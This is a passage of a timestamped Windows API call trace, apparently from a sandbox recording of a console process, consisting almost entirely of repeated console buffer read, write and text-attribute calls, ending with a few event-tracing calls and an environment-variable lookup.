GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.250] GetConsoleOutputCP () returned 0x1b5 [0312.251] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.251] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.251] CoTaskMemFree (pv=0x1ad7bc60) [0312.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.252] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.252] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.253] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.254] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.254] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.255] GetConsoleOutputCP () returned 0x1b5 [0312.256] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.256] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.256] CoTaskMemFree (pv=0x1ad7bc60) [0312.256] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2949a0c*, nNumberOfCharsToWrite=0x77, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2949a0c*, lpNumberOfCharsWritten=0x1b83da58*=0x77) returned 1 [0312.257] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.257] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.258] GetConsoleOutputCP () returned 0x1b5 [0312.258] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.258] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.259] CoTaskMemFree (pv=0x1ad7bc60) [0312.259] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.259] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.260] GetConsoleOutputCP () returned 0x1b5 [0312.260] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.260] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.261] CoTaskMemFree (pv=0x1ad7bc60) [0312.261] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.261] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.262] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.262] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.263] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.263] GetConsoleOutputCP () returned 0x1b5 [0312.263] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.264] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.265] CoTaskMemFree (pv=0x1ad7bc60) [0312.265] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.266] GetConsoleOutputCP () returned 0x1b5 [0312.267] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.267] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.267] CoTaskMemFree (pv=0x1ad7bc60) [0312.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.268] GetConsoleOutputCP () returned 0x1b5 [0312.269] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.269] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.269] CoTaskMemFree (pv=0x1ad7bc60) [0312.269] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.270] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.270] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.270] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.271] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.272] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.272] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.272] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.273] GetConsoleOutputCP () returned 0x1b5 [0312.273] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.273] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.274] CoTaskMemFree (pv=0x1ad7bc60) [0312.274] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2949d04*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2949d04*, lpNumberOfCharsWritten=0x1b83da58*=0xf) returned 1 [0312.274] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.275] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.275] GetConsoleOutputCP () returned 0x1b5 [0312.276] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.276] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.276] CoTaskMemFree (pv=0x1ad7bc60) [0312.276] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.277] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.277] GetConsoleOutputCP () returned 0x1b5 [0312.278] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.278] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.278] CoTaskMemFree (pv=0x1ad7bc60) [0312.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.279] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.280] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.281] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.281] GetConsoleOutputCP () returned 0x1b5 [0312.282] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.282] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.283] CoTaskMemFree (pv=0x1ad7bc60) [0312.283] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.284] GetConsoleOutputCP () returned 0x1b5 [0312.284] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.285] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.285] CoTaskMemFree (pv=0x1ad7bc60) [0312.285] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.285] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.286] GetConsoleOutputCP () returned 0x1b5 [0312.286] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.286] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.287] CoTaskMemFree (pv=0x1ad7bc60) [0312.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.288] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.288] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.288] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.289] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.289] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.290] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.290] GetConsoleOutputCP () returned 0x1b5 [0312.291] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.291] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.292] CoTaskMemFree (pv=0x1ad7bc60) [0312.292] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2947edc*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2947edc*, lpNumberOfCharsWritten=0x1b83da58*=0x41) returned 1 [0312.292] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.293] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.293] GetConsoleOutputCP () returned 0x1b5 [0312.293] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.293] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.294] CoTaskMemFree (pv=0x1ad7bc60) [0312.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.295] GetConsoleOutputCP () returned 0x1b5 [0312.303] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.303] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.305] CoTaskMemFree (pv=0x1ad7bc60) [0312.305] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.305] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.305] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.306] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.306] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.307] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.307] GetConsoleOutputCP () returned 0x1b5 [0312.307] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.307] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.308] CoTaskMemFree (pv=0x1ad7bc60) [0312.308] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.310] GetConsoleOutputCP () returned 0x1b5 [0312.310] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.310] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.311] CoTaskMemFree (pv=0x1ad7bc60) [0312.311] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.311] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.312] GetConsoleOutputCP () returned 0x1b5 [0312.312] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.312] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.313] CoTaskMemFree (pv=0x1ad7bc60) [0312.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.314] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.314] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.315] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.315] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.315] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.316] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.316] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.317] GetConsoleOutputCP () returned 0x1b5 [0312.317] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.317] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.318] CoTaskMemFree (pv=0x1ad7bc60) [0312.318] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2947f7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2947f7c*, lpNumberOfCharsWritten=0x1b83da58*=0x1) returned 1 [0312.318] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.319] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.319] GetConsoleOutputCP () returned 0x1b5 [0312.320] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.320] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.320] CoTaskMemFree (pv=0x1ad7bc60) [0312.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.321] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.321] GetConsoleOutputCP () returned 0x1b5 [0312.321] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.322] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.322] CoTaskMemFree (pv=0x1ad7bc60) [0312.322] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.323] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.323] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.323] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.324] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.324] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.325] GetConsoleOutputCP () returned 0x1b5 [0312.338] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.338] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.338] CoTaskMemFree (pv=0x1ad7bc60) [0312.339] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.339] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.339] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.340] GetConsoleOutputCP () returned 0x1b5 [0312.340] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.340] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.341] CoTaskMemFree (pv=0x1ad7bc60) [0312.341] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.341] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.342] GetConsoleOutputCP () returned 0x1b5 [0312.342] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.342] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.344] CoTaskMemFree (pv=0x1ad7bc60) [0312.348] EtwEventActivityIdControl () returned 0x0 [0312.348] EtwEventActivityIdControl () returned 0x0 [0312.348] EtwEventActivityIdControl () returned 0x0 [0312.348] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0312.348] EtwEventActivityIdControl () returned 0x0 [0312.348] EtwEventActivityIdControl () returned 0x0 [0312.348] EtwEventActivityIdControl () returned 